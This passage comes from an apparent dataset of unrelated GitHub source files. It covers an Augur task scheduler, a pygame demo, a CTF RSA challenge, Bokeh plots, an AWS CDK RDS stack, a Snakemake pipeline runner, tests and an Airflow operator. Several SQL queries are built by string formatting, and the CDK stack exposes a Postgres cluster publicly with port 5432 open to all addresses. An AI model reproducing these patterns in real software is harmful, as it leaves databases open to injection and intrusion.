'postgresql://{}:{}@{}:{}/{}'.format(\n user, password, host, port, dbname\n )\n\n dbschema='augur_data'\n self.db = s.create_engine(DB_STR, poolclass=s.pool.NullPool,\n connect_args={'options': '-csearch_path={}'.format(dbschema)})\n\n helper_schema = 'augur_operations'\n self.helper_db = s.create_engine(DB_STR, poolclass = s.pool.NullPool,\n connect_args={'options': '-csearch_path={}'.format(helper_schema)})\n\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT repo_git FROM repo\n \"\"\")\n\n rs = pd.read_sql(repoUrlSQL, self.db, params={})\n\n all_repos = rs['repo_git'].values.tolist()\n\n # List of tasks that need periodic updates\n self.__updatable = self.prep_jobs(jobs)\n\n self.__processes = []\n self.__updater()\n\n @staticmethod\n def updater_process(broker_host, broker_port, broker, model, given, delay, repos, repo_group_id=None):\n \"\"\"\n Controls a given plugin's update process\n :param name: name of object to be updated \n :param delay: time needed to update\n :param shared: shared object that is to also be updated\n \"\"\"\n if repo_group_id:\n logging.info('Housekeeper spawned {} model updater process for subsection {} with PID {}'.format(model, repo_group_id, os.getpid()))\n else:\n logging.info('Housekeeper spawned {} model updater process for repo {} with PID {}'.format(model, repos[0]['repo_id'], os.getpid()))\n\n try:\n compatible_worker_found = False\n # Waiting for compatible worker\n while True:\n for worker in list(broker._getvalue().keys()):\n # logging.info(\"{} {} {} {} {}\".format(worker, model, broker[worker]['models'], given, broker[worker]['given']))\n if model in broker[worker]['models'] and given in broker[worker]['given']:\n compatible_worker_found = True\n if compatible_worker_found:\n logging.info(\"Housekeeper recognized that the broker has a worker that \" + \n \"can handle the {} model... beginning to distribute maintained tasks\".format(model))\n time.sleep(4)\n while True:\n logging.info('Housekeeper updating {} model with given {}...'.format(\n model, given[0]))\n \n if given[0] == 'git_url' or given[0] == 'github_url':\n for repo in repos:\n if given[0] == 'github_url' and 'github.com' not in repo['repo_git']:\n continue\n given_key = 'git_url' if given[0] == 'git_url' else 'github_url'\n task = {\n \"job_type\": \"MAINTAIN\", \n \"models\": [model], \n \"display_name\": \"{} model for url: {}\".format(model, repo['repo_git']),\n \"given\": {}\n }\n task['given'][given_key] = repo['repo_git']\n if \"focused_task\" in repo:\n task[\"focused_task\"] = repo['focused_task']\n try:\n requests.post('http://{}:{}/api/unstable/task'.format(\n broker_host,broker_port), json=task, timeout=10)\n except Exception as e:\n logging.info(\"Error encountered: {}\".format(e))\n\n time.sleep(0.5)\n elif given[0] == 'repo_group':\n task = {\n \"job_type\": \"MAINTAIN\", \n \"models\": [model], \n \"display_name\": \"{} model for repo group id: {}\".format(model, repo_group_id),\n \"given\": {\n \"repo_group\": repos\n }\n }\n try:\n requests.post('http://{}:{}/api/unstable/task'.format(\n broker_host,broker_port), json=task, timeout=10)\n except Exception as e:\n logging.info(\"Error encountered: {}\".format(e))\n\n logging.info(\"Housekeeper finished sending {} tasks to the broker for it to distribute to your worker(s)\".format(len(repos)))\n time.sleep(delay)\n break\n time.sleep(3)\n \n except KeyboardInterrupt:\n os.kill(os.getpid(), 9)\n os._exit(0)\n except:\n raise\n\n def __updater(self, updates=None):\n \"\"\"\n Starts update processes\n \"\"\"\n logging.info(\"Starting update processes...\")\n if updates is None:\n updates = self.__updatable\n for update in updates:\n up = Process(target=self.updater_process, args=(self.broker_host,self.broker_port, self.broker, update['model'], \n update['given'], update['delay'], update['repos'], update['repo_group_id']), daemon=True)\n up.start()\n self.__processes.append(up)\n\n def update_all(self):\n \"\"\"\n Updates all plugins\n \"\"\"\n for updatable in self.__updatable:\n updatable['update']()\n\n def schedule_updates(self):\n \"\"\"\n Schedules updates\n \"\"\"\n # don't use this, \n logging.debug('Scheduling updates...')\n self.__updater()\n\n def join_updates(self):\n \"\"\"\n Join to the update processes\n \"\"\"\n for process in self.__processes:\n process.join()\n\n def shutdown_updates(self):\n \"\"\"\n Ends all running update processes\n \"\"\"\n for process in self.__processes:\n process.terminate()\n\n def prep_jobs(self, jobs):\n\n for job in jobs:\n if 'repo_group_id' in job:\n if job['repo_group_id'] != 0:\n # Query all repos and last repo id\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT repo_git, repo_id FROM repo WHERE repo_group_id = {} ORDER BY repo_id ASC\n \"\"\".format(job['repo_group_id']))\n else:\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT repo_git, repo_id FROM repo ORDER BY repo_id ASC\n \"\"\".format(job['repo_group_id']))\n rs = pd.read_sql(repoUrlSQL, self.db, params={})\n if len(rs) == 0:\n logging.info(\"Trying to send tasks for repo group with id: {}, but the repo group does not contain any repos\".format(job['repo_group_id']))\n continue\n\n if 'starting_repo_id' in job:\n last_id = job['starting_repo_id']\n else:\n repoIdSQL = s.sql.text(\"\"\"\n SELECT since_id_str FROM worker_job\n WHERE job_model = '{}'\n \"\"\".format(job['model']))\n\n job_df = pd.read_sql(repoIdSQL, self.helper_db, params={})\n\n # If a last id is not recorded, start from beginning of repos \n # (first id is not necessarily 0)\n try:\n last_id = int(job_df.iloc[0]['since_id_str'])\n except:\n last_id = 0\n\n jobHistorySQL = s.sql.text(\"\"\"\n SELECT max(history_id) AS history_id, status FROM worker_history\n GROUP BY status\n LIMIT 1\n \"\"\")\n\n history_df = pd.read_sql(jobHistorySQL, self.helper_db, params={})\n\n finishing_task = False\n if len(history_df.index) != 0:\n if history_df.iloc[0]['status'] == 'Stopped':\n self.history_id = int(history_df.iloc[0]['history_id'])\n finishing_task = True\n # last_id += 1 #update to match history tuple val rather than just increment\n\n\n # Rearrange repos so the one after the last one that \n # was completed will be ran first\n before_repos = rs.loc[rs['repo_id'].astype(int) < last_id]\n after_repos = rs.loc[rs['repo_id'].astype(int) >= last_id]\n\n reorganized_repos = after_repos.append(before_repos)\n\n if 'all_focused' in job:\n reorganized_repos['focused_task'] = job['all_focused']\n\n reorganized_repos = reorganized_repos.to_dict('records')\n \n if finishing_task:\n reorganized_repos[0]['focused_task'] = 1\n \n job['repos'] = reorganized_repos\n\n elif 'repo_id' in job:\n job['repo_group_id'] = None\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT repo_git, repo_id FROM repo WHERE repo_id = {}\n \"\"\".format(job['repo_id']))\n\n rs = pd.read_sql(repoUrlSQL, self.db, params={})\n\n if 'all_focused' in job:\n rs['focused_task'] = job['all_focused']\n\n rs = rs.to_dict('records')\n\n job['repos'] = rs\n\n return jobs\n\n","repo_name":"computationalmystic/sengfs19-group8","sub_path":"augur/housekeeper/housekeeper.py","file_name":"housekeeper.py","file_ext":"py","file_size_in_byte":10267,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"32019625256","text":"import pygame\n\n# initialize pygame\npygame.init()\n\n# display pygame window width and height; tuple\nwin = pygame.display.set_mode((500, 500))\n\n# display caption\npygame.display.set_caption(\"First Game\")\n\n# 3. add screen width\nscreenWidth = 500\n\nx = 50\ny = 50\nwidth = 40\nheight = 50\nvel = 20\n\n# 5. jumping\nisJump = False\njumpCount = 10\n\nrun = True\n# main loop check for collision\nwhile run:\n pygame.time.delay(100) # delay in milliseconds\n\n for event in pygame.event.get():\n # 1. check if click exit button\n if event.type == pygame.QUIT:\n run = False\n\n # 3. key pressed \n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and x > vel: # add 2nd condition to not go off screen\n x -= vel\n if keys[pygame.K_RIGHT] and x < screenWidth - width: # screen width - the character width\n x += vel\n # 5. jumping\n if not(isJump):\n if keys[pygame.K_UP] and y > vel:\n y -= vel\n if keys[pygame.K_DOWN] and y < screenWidth - vel:\n y += vel\n if keys[pygame.K_SPACE]: # 5. jumping\n isJump = True\n else: # 5. jumping\n if jumpCount >= -10:\n neg = 1\n if jumpCount < 0:\n neg = -1\n y -= (jumpCount ** 2) * 0.5 * neg\n jumpCount -= 1\n else:\n isJump = False\n jumpCount = 10\n\n # 4. draw over the rectangles once move\n win.fill((0,0,0))\n\n # 2. draw shape; parameter ==> ((surface, color, rect)\n pygame.draw.rect(win, (233, 255, 0), (x, y, width, height))\n pygame.display.update()\n\n\npygame.quit()","repo_name":"wonntann/Pygame","sub_path":"pygameMovement/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72336363992","text":"from Crypto.Util.number import getPrime, bytes_to_long\n\nwith open(\"flag.txt\",'r') as f:\n\tflag = f.read()\n\ndef main():\n\tN = getPrime(512)*getPrime(512)\n\tc = pow(bytes_to_long(bytes(flag,'utf-8')),3,N)\n\tprint('N =',N)\n\tprint('e = 3')\n\tprint('c =',c)\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"USC-CTF-Team/public-USC-CTF-Fall-23","sub_path":"crypto/RSA-1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"23629448096","text":"from math import pi\nimport numpy as np\n\nfrom bokeh.plotting import figure\nfrom bokeh.models import ColumnDataSource, FactorRange\nfrom bokeh.palettes import Category20, Spectral5\nfrom bokeh.transform import cumsum, factor_cmap\n\n#local imports\nfrom .transform_to_list import Transform\n\n\ndef select_and_plot(session, name_button, plot_function, upload_folder):\n \"\"\"Function to manage the data and plot selection\n\n session: session of Flask\n name_button: Name of the button that pass the form value (String)\n plot_function: Plot function (function)\n upload_folder: Name of the folder where the file is (string)\"\"\"\n\n #Define the data to be graph\n filename = session.get('file_data_name')\n #Columns added to be plot\n data_graph = session.get(name_button)\n #Organize the data and make the plot\n if (data_graph is not None) and (len(data_graph) > 0):\n #Get the table \n table = Transform(filename, upload_folder)\n #Select the specified data\n table_selected_data = table.select_data(data_graph)\n #Plot\n p = plot_function(data_graph, table_selected_data)\n\n return p\n else:\n return None\n\n\n\ndef transform_to_num(col_names, data):\n \"\"\"Transform the strings value into floats, the categorical values will be left apart, the \n return will be a dictionary.\n\n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n\n int_data = {}\n\n for name, row in zip(col_names, data):\n \n try:\n for i in range(len(row)):\n row[i] = float(row[i])\n\n int_data[name] = row\n except ValueError:\n continue \n \n return int_data\n\n \n\ndef pie_graph( col_names, data):\n \"\"\"Function to make the pie plot, take the columns transform into float values and sum all the values to make\n the plot (it can't do a pie plot per row).\n \n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n \n #Summarize the columns\n pie_data = transform_to_num(col_names, data)\n for name, row in pie_data.items():\n pie_data[name] = sum(row)\n\n \n #Define the final data for the graph (format)\n data_bokeh = {'legends': list(pie_data.keys()),\n 'values': list(pie_data.values()),\n 'color': Category20[20]}\n\n data_bokeh['angles'] = []\n for name, val in pie_data.items():\n angle = val/sum(list(pie_data.values())) * 2 * pi\n data_bokeh['angles'].append(angle)\n \n #Transform the dictionary into the format required by bokeh\n source = ColumnDataSource(data_bokeh)\n\n #Bokeh plot configuration\n p = figure(plot_height = 600, plot_width = 800, tools = 'hover', tooltips = \"@legends: @values\")\n p.wedge(x = 0, y = 1, radius =0.6, start_angle = cumsum('angles', include_zero = True), \n end_angle = cumsum('angles'), legend_field = 'legends', fill_color = 'color', \n line_color ='white', source = source)\n\n return p\n\n \n\ndef bar_graph(col_names, data):\n \"\"\"Function to make the bar plot, take the columns transform into float values. \n the FIRST COLUMN MUST BE CATEGORICAL, the other numerical and will be added to the plot\n \n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n\n #Take the first column, MUST BE CATEGORICAL\n data_bokeh = {\n 'categorical': data[0],\n }\n\n #Organize the dictionary information\n bar_data = transform_to_num(col_names, data)\n data_bokeh.update(bar_data)\n data_bokeh['data_col']= list(bar_data.keys())\n \n #Define necessary columns for multiple bars\n x = [(categ, data) for categ in data_bokeh['categorical'] for data in data_bokeh['data_col']]\n ##Organize all the numerical data in a single list\n counts = []\n for i in range(len(data[0])):\n for name in bar_data.keys():\n counts.append(bar_data[name][i])\n \n #Transform the dictionary into the format required by bokeh\n source = ColumnDataSource(data = dict(x = x, counts = counts))\n\n #Bokeh plot configuration\n p = figure(plot_height = 600, plot_width = 800, x_range = FactorRange(*x))\n p.vbar(x = 'x', top = 'counts', width = 0.9, line_color = 'white', source = source,\n fill_color = factor_cmap('x', palette = Spectral5, factors = data_bokeh['data_col'], start = 1, end = 2) )\n p.x_range.range_padding = 0.1\n p.xaxis.major_label_orientation = 1.2\n \n return p\n \n \n\ndef histogram_plot(col_names, data):\n \"\"\"Function to make the histogram, only show one variable \n \n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n\n #transform to numerical data\n hist_data = transform_to_num(col_names, data)\n\n #Calculate and define the histogram data\n hist, edges = np.histogram(list(hist_data.values())[0], density = True, bins = 30)\n\n #Bokeh plot configuration\n p = figure(plot_height = 600, plot_width = 800)\n p.quad(top = hist, bottom = 0, left = edges[:-1], right = edges[1:], line_color = 'white')\n\n return p \n\n\ndef line_plot(col_names, data):\n \"\"\"Function to make the line plot, the FIRST COLUMN will be the x axis and the others will be added\n \n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n\n #Transform to numerical data\n line_data = transform_to_num(col_names, data)\n \n #Transform the dictionary into the format required by bokeh\n source = ColumnDataSource(line_data)\n\n #Bokeh plot configuration\n p = figure(plot_height = 600, plot_width = 800)\n for key, color in zip(range(len(line_data.keys())), Category20[20]):\n if key != 0:\n p.line(x = list(line_data.values())[0], y = list(line_data.values())[key], color = color, \n legend_label = list(line_data.keys())[key])\n\n return p \n \n\ndef scatter_plot(col_names, data):\n \"\"\"Function to make the scatter plot, the FIRST COLUMN will be the x axis and the others will be added\n \n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n\n #Transform to numerical data\n scatter_data = transform_to_num(col_names, data)\n\n #Transform the dictionary into the format required by bokeh\n source = ColumnDataSource(scatter_data)\n\n #Bokeh plot configuration\n p = figure(plot_height = 600, plot_width = 800)\n for key, color in zip(range(len(scatter_data.keys())), Category20[20]):\n if key != 0:\n p.scatter(x = list(scatter_data.values())[0], y = list(scatter_data.values())[key], color = color, \n fill_alpha = 0.6, legend_label = list(scatter_data.keys())[key])\n\n return p \n\n\n\n\n\n\n","repo_name":"AndresRubianoM/Web-DataVisualization","sub_path":"app/plots_functions.py","file_name":"plots_functions.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36718770304","text":"from aws_cdk import Stack, aws_ec2 as ec2, aws_rds as rds\nfrom constructs import Construct\n\n\nclass TechChallengeRds(Stack):\n def __init__(\n self, scope: Construct, construct_id: str, vpc: ec2.Vpc, **kwargs\n ) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n # Create RDS Security Group\n rds_sg = ec2.SecurityGroup(\n self,\n f\"{construct_id}-RDS-SG\",\n security_group_name=f\"{construct_id}-RDS-SG\",\n vpc=vpc,\n )\n rds_sg.add_ingress_rule(peer=ec2.Peer.any_ipv4(), connection=ec2.Port.tcp(5432))\n\n # Deploy Postgres RDS Instance in Private Subnet with MultiAZ\n self.db = rds.DatabaseCluster(\n self,\n id=f\"{construct_id}-Postgres\",\n cluster_identifier=f\"{construct_id}-Postgres\",\n engine=rds.DatabaseClusterEngine.aurora_postgres(\n version=rds.AuroraPostgresEngineVersion.VER_13_3\n ),\n instance_props=rds.InstanceProps(\n vpc=vpc,\n vpc_subnets=ec2.SubnetSelection(subnet_type=ec2.SubnetType.PUBLIC),\n instance_type=ec2.InstanceType.of(\n ec2.InstanceClass.BURSTABLE3, ec2.InstanceSize.MEDIUM\n ),\n publicly_accessible=True,\n security_groups=[rds_sg],\n ),\n deletion_protection=False,\n )\n","repo_name":"dinindunz/tech_challenge_app","sub_path":"stacks/tech_challenge_rds.py","file_name":"tech_challenge_rds.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7621849896","text":"import subprocess\nimport argparse\nimport re\nimport sys\nimport shutil\nimport os\n\ndef get_options():\n parser = argparse.ArgumentParser(description=\"Run pipeline to analyse flanking regions of a focal gene.\")\n parser.add_argument(\"--contigs\", required=True,\n help=\"fasta with contigs containing central/focal gene\")\n parser.add_argument(\"--gene_fasta\", required=True,\n help=\"fasta with nucleotide sequence of focal gene\")\n parser.add_argument(\"--focal_gene_name\", required=True,\n help=\"name of focal gene\\n(NOTE: if using gffs, must match name of protein product e.g. IMP-4 not blaIMP-4)\")\n parser.add_argument(\"--flanking_region\", required=False,\n help=\"size of flanking region (N.B. currently symmetrical upstream/downstream). Default: 5000\",\n default=\"5000\")\n parser.add_argument(\"--output_dir\", required=False,\n help=\"output directory. Default: output\",\n default=\"output\")\n parser.add_argument(\"--force\", required=False,\n help=\"whether to overwrite existing input files. Default: False\",\n action='store_true')\n parser.add_argument(\"--gff\", required=False,\n help=\"file with gff annotations for contigs. Default: none\",\n default=\"\")\n parser.add_argument(\"--panx_export\", required=False,\n help=\"whether to export panX output from pangraph. Default: False\",\n action=\"store_true\")\n parser.add_argument(\"--bandage\", required=False,\n help=\"whether to run Bandage on pangraph. Default: False\",\n action=\"store_true\")\n parser.add_argument(\"--snv_threshold\", required=False,\n help=\"Nucleotide-level difference threshold for focal gene (1 SNV = 1 diff, Xbp indel = X diffs). Default: 25\",\n default=\"25\")\n parser.add_argument(\"--gene_length_threshold\", required=False,\n help=\"Lateral coverage required of focal gene (0-1). Default: 0.99\",\n default=\"0.99\")\n parser.add_argument(\"--pangraph_polish\", required=False,\n help=\"whether to polish the pangraph. Default: False\",\n action=\"store_true\")\n parser.add_argument(\"--pangraph_aligner\", required=False,\n help=\"aligner to use for building pangraph. Default: minimap2\",\n default=\"minimap2\",\n choices=[\"minimap2\", \"mmseqs\"])\n parser.add_argument(\"--pangraph_seed\", required=False,\n help=\"random seed for pangraph (for reproducibility). Default: 0\",\n default=\"0\")\n parser.add_argument(\"--pangraph_alpha\", required=False,\n help=\"value of alpha parameter for pangraph. Default: 100\",\n default=\"100\")\n parser.add_argument(\"--pangraph_beta\", required=False,\n help=\"value of beta parameter for pangraph. Default: 10\",\n default=\"10\")\n parser.add_argument(\"--pangraph_dist_backend\", required=False,\n help=\"distance backend for calculation of pangraph. Default: native\",\n default=\"native\",\n choices=[\"native\", \"mash\"])\n parser.add_argument(\"--pangraph_minblocklength\", required=False,\n help=\"minimum block length for pangraph. Default: 100\",\n default=\"100\")\n parser.add_argument(\"--pangraph_edgeminlength\", required=False,\n help=\"minimum edge length for pangraph when exporting gfa. Default: 0\",\n default=\"0\")\n parser.add_argument(\"--breakpoint_minimap2\", required=False,\n help=\"whether to also calculate breakpoint distances using minimap2. Default: False\",\n action=\"store_true\")\n return parser.parse_args()\n\ndef run_snakemake_pipeline(config_file):\n snakemake_command = f\"snakemake --cores 1 --configfile {config_file} -r prepare_DB run_pangraph calculate_distances make_plots\"\n print(snakemake_command)\n subprocess.run(snakemake_command, shell=True)\n\ndefault_options = {\"version\":\"default\",\n \"focal_genes\": \"[]\",\n \"complete\": \"True\",\n \"version\" : \"default\",\n \"panx_export\": \"False\",\n \"bandage\": \"True\",\n \"snv_threshold\": \"25\",\n \"gene_length_threshold\": \"0.99\",\n \"region_upstream\": \"5000\",\n \"region_downstream\": \"5000\",\n \"pangraph_polish\": \"False\",\n \"pangraph_aligner\": \"minimap2\",\n \"pangraph_seed\":\"0\",\n \"pangraph_alpha\": \"100\",\n \"pangraph_beta\": \"10\",\n \"pangraph_dist_backend\": \"native\",\n \"pangraph_minblocklength\": \"100\",\n \"pangraph_edgeminlength\": \"0\",\n \"include_gff\": \"False\",\n \"output_dir\": \"output\",\n \"breakpoint_minimap2\":\"False\"}\nboolean_options = [\"complete\", \"panx_export\", \"pangraph_polish\",\n \"include_gff\", \"breakpoint_minimap2\", \"bandage\"]\n\n\ndef write_config_file(user_options, config_file):\n with open(config_file, 'w') as f:\n for key in default_options.keys():\n if key in user_options.keys():\n if key==\"focal_genes\":\n f.write(\"%s: [\\\"%s\\\"]\\n\" % (key, user_options[key]))\n elif key in boolean_options:\n f.write(\"%s: %s\\n\" % (key, user_options[key]))\n else:\n f.write(\"%s: \\\"%s\\\"\\n\" % (key, user_options[key]))\n else:\n if key in boolean_options:\n f.write(\"%s: %s\\n\" % (key, default_options[key]))\n else:\n f.write(\"%s: \\\"%s\\\"\\n\" % (key, default_options[key]))\n\n\ndef rewrite_gene_fasta(gene_fasta, new_prefix, new_fasta):\n with open(gene_fasta, 'r') as f:\n gene_fasta_string = f.read()\n if gene_fasta_string.count(\">\")>1:\n print(\"Warning: gene fasta \"+gene_fasta+\" seems to have more than one fasta header\")\n sys.exit(1)\n elif gene_fasta_string.count(\">\")==1:\n re.sub(\">\", \">\"+new_prefix+\" \", gene_fasta_string)\n with open(new_fasta, \"w\") as f:\n f.write(gene_fasta_string)\n\nif __name__ == \"__main__\":\n\n # Parse command line arguments\n args = get_options()\n\n user_options = {\"output_dir\": args.output_dir, \n \"focal_genes\": args.focal_gene_name,\n \"panx_export\": args.panx_export,\n \"bandage\": args.bandage,\n \"snv_threshold\": args.snv_threshold,\n \"gene_length_threshold\": args.gene_length_threshold,\n \"region_upstream\": args.flanking_region, \n \"region_downstream\": args.flanking_region,\n \"pangraph_polish\": args.pangraph_polish,\n \"pangraph_aligner\": args.pangraph_aligner,\n \"pangraph_seed\":args.pangraph_seed,\n \"pangraph_alpha\":args.pangraph_alpha,\n \"pangraph_beta\": args.pangraph_beta,\n \"pangraph_dist_backend\": args.pangraph_dist_backend,\n \"pangraph_minblocklength\": args.pangraph_minblocklength,\n \"pangraph_edgeminlength\": args.pangraph_edgeminlength,\n \"breakpoint_minimap2\": args.breakpoint_minimap2}\n if not os.path.exists(args.output_dir):\n print(\"Making output dir: \", args.output_dir)\n os.makedirs(args.output_dir)\n\n if os.path.exists(args.output_dir+\"/\"+args.focal_gene_name):\n print(\"Warning: output directory \"+args.output_dir+\"/\"+args.focal_gene_name+\" exists.\")\n print(\"If you encounter snakemake errors, rerun the snakemake command below and add --unlock.\")\n if args.force:\n print(\"You used --force! Removing previous results and rerunning pipeline.\")\n shutil.rmtree(args.output_dir+\"/\"+args.focal_gene_name)\n\n if not os.path.exists(\"configs\"):\n os.makedirs(\"configs\")\n config_file = \"configs/\"+\"config_\"+args.focal_gene_name+\".yaml\"\n\n # copy files into input directory if needed \n # (wasteful, but because of how I've written snakemake pipeline to function with multiple genes)\n if not os.path.exists(\"input\"):\n os.makedirs(\"input\")\n for subdir in [\"gffs\", \"contigs\", \"focal_genes\"]:\n if not os.path.exists(\"input/\"+subdir):\n os.makedirs(\"input/\"+subdir)\n contigs_file = \"input/contigs/\"+args.focal_gene_name+\"_contigs.fa\"\n gene_file = \"input/focal_genes/\"+args.focal_gene_name+\".fa\"\n\n if args.gff!=\"\":\n user_options[\"include_gff\"] = \"True\"\n gff_file = \"input/gffs/\"+args.focal_gene_name+\"_annotations.gff\"\n if args.gff==gff_file:\n pass\n else:\n shutil.copy(args.gff, gff_file)\n\n if args.contigs==contigs_file:\n pass\n else:\n shutil.copy(args.contigs, contigs_file)\n\n if args.gene_fasta==gene_file:\n with open(args.gene_fasta, \"r\") as f:\n header = f.readline().split(\" \")[0][1:]\n if header!=args.focal_gene_name:\n print(\"Warning: your focal gene fasta does not have the same name as the focal gene. Please amend.\")\n sys.exit(1)\n else:\n rewrite_gene_fasta(args.gene_fasta, args.focal_gene_name, gene_file)\n \n # Write the config file\n write_config_file(user_options, config_file)\n\n # Call the Snakemake pipeline\n run_snakemake_pipeline(config_file)\n","repo_name":"liampshaw/mobile-gene-regions","sub_path":"analyze-flanking-regions.py","file_name":"analyze-flanking-regions.py","file_ext":"py","file_size_in_byte":9914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"2941373643","text":"from lib.solutions.SUM import sum_solution\nimport pytest\n\n\nclass TestSum():\n def test_sum(self):\n \"\"\"\n GIVEN the sum_two_numbers method\n WHEN two positive numbers between 0 and 100 are passed\n THEN the output is the sum of those two numbers\n \"\"\"\n assert sum_solution.compute(1, 2) == 3\n\n def test_sum_raises_exception(self):\n \"\"\"\n GIVEN the sum_two_numbers method\n WHEN one of the input numbers is outside the 0-100 range\n THEN a ValueError exception is raised\n \"\"\"\n\n with pytest.raises(ValueError) as e:\n res = sum_solution.compute(195, 2)\n\n assert \"num1 must be in the range 0-100\" in str(e)\n\n with pytest.raises(ValueError) as e:\n res = sum_solution.compute(2, -100)\n \n assert \"num2 must be in the range 0-100\" in str(e)\n","repo_name":"DPNT-Sourcecode/CHK-jqmj01","sub_path":"test/solution_tests/SUM/test_sum.py","file_name":"test_sum.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2180781519","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nimport logging\n\n\nclass LoadFactOperator(BaseOperator):\n '''\n This operator loads fact tables into Amazon Redshift\n Parameters\n ----------\n redshift_conn_id : str\n Amazon Redshift RDB credentials\n \n table : str\n Table name which data will be inserted into\n \n sql : str\n The sql query used to insert data into the fact table\n '''\n\n\n ui_color = '#F98866'\n\n @apply_defaults\n def __init__(self,\n # Define your operators params (with defaults) here\n # Example:\n # conn_id = your-connection-name\n redshift_conn_id=\"\",\n table=\"\",\n sql=\"\",\n *args, **kwargs):\n\n super(LoadFactOperator, self).__init__(*args, **kwargs)\n # Map params here\n # Example:\n # self.conn_id = conn_id\n self.redshift_conn_id = redshift_conn_id\n self.table = table\n self.sql=sql\n\n def execute(self, context):\n # connect to Amazon Redshift\n redshift_hook = PostgresHook(self.redshift_conn_id)\n self.log.info(f'Loading data into {self.table} fact table...')\n \n # Execute the insertion query on Redshift hook\n redshift_hook.run(f\"INSERT INTO {self.table} {self.sql}\")\n self.log.info(f\"LoadFactOperator implemented: Data inserted into {self.table} in Redshift\")\n","repo_name":"Sampsonyu/Data_Pipeline_with_Airflow","sub_path":"plugins/operators/load_fact.py","file_name":"load_fact.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"25312295870","text":"# 1. Написать рекурсивную функцию для вычисления суммы всех элементов вложенных (любая глубина) списков.\n# Пример списка (синтаксис Python): [1, 2, [2, 4, [[7, 8], 4, 6]]], сумма элементов - 34\n\n\ndef sum_all(l):\n total = 0\n for i in l:\n if (type(i) == type([])):\n total = total + sum_all(i)\n else:\n total = total + i\n return total\nprint(\"cумма элементов -\", sum_all([1, 2, [2, 4, [[7, 8], 4, 6]]]))\n\n\n# 2. Написать рекурсивную функцию для вычисления n первых чисел Фибоначчи.\n# Примеры вызова: \n# fib(5) -> 0,1,1,2,3\n# fib(10) -> 0,1,1,2,3,5,8,13,21,34\n\ndef fib(n):\n def fib_num(n):\n if n <= 1:\n return n \n else:\n return fib_num(n-1) + fib_num(n-2)\n return ','.join([str(fib_num(i)) for i in range(n)])\n\nprint(fib(5))\nprint(fib(10))","repo_name":"MikitaTsiarentsyeu/Md-PT1-52-22","sub_path":"Tasks/Drobyshev/Task7/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"71911210711","text":"import argparse\nimport os\nfrom pdb import set_trace as bp\n\nimport torch\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\n# my lib\nimport data_loader.data_loaders as module_data\nimport model.model as module_arch\nfrom parse_config import ConfigParser\nfrom utils import to_device\nfrom constant import target_indices\n\n\ndef main(config, output_type='top3_indices', output_dir='./submission.csv'):\n logger = config.get_logger('test')\n\n # setup data_loader instances\n config['data_loader']['args']['validation_split'] = False\n config['data_loader']['args']['training'] = False\n # config['data_loader']['args']['batch_size'] = 512\n config['data_loader']['args']['num_workers'] = 2\n\n data_loader = getattr(module_data, config['data_loader']['type'])(\n **config['data_loader']['args'],\n )\n\n # build model architecture\n model = config.init_obj('arch', module_arch)\n logger.info(model)\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n logger.info('Loading checkpoint: {} ...'.format(config.resume))\n checkpoint = torch.load(config.resume, map_location=device)\n state_dict = checkpoint['state_dict']\n if config['n_gpu'] > 1:\n model = torch.nn.DataParallel(model)\n model.load_state_dict(state_dict)\n\n # prepare model for testing\n model = model.to(device)\n model.eval()\n\n outputs_logits = []\n outputs_top3 = []\n chids = []\n with torch.no_grad():\n for i, (data, chid) in enumerate(tqdm(data_loader)):\n output = model(to_device(data, device))\n if len(output.size()) >= 3:\n output = output[:, -1]\n\n output = output[:, target_indices]\n _, output_topk_indices = torch.topk(output, 3, dim=1)\n\n chids.append(chid.cpu().detach().numpy())\n outputs_logits.append(output.cpu().detach().numpy())\n outputs_top3.append(target_indices[output_topk_indices.cpu().detach().numpy().astype(int)]+1)\n\n chids = np.concatenate(chids, axis=0).reshape(-1, 1).astype(int)\n outputs_logits = np.concatenate(outputs_logits, axis=0).astype(float)\n outputs_top3 = np.concatenate(outputs_top3, axis=0).astype(int)\n # bp()\n pd.DataFrame(\n data=np.concatenate([chids, outputs_top3], axis=1),\n columns=['chid', 'top1', 'top2', 'top3']).astype(str).to_csv(f'{output_dir}/outputs_top3.csv', index=None)\n pd.DataFrame(\n data=np.concatenate([chids, outputs_logits], axis=1),\n columns=['chid']+list(range(16))).astype(str).to_csv(f'{output_dir}/outputs_logits.csv', index=None)\n \n\n\nif __name__ == '__main__':\n args = 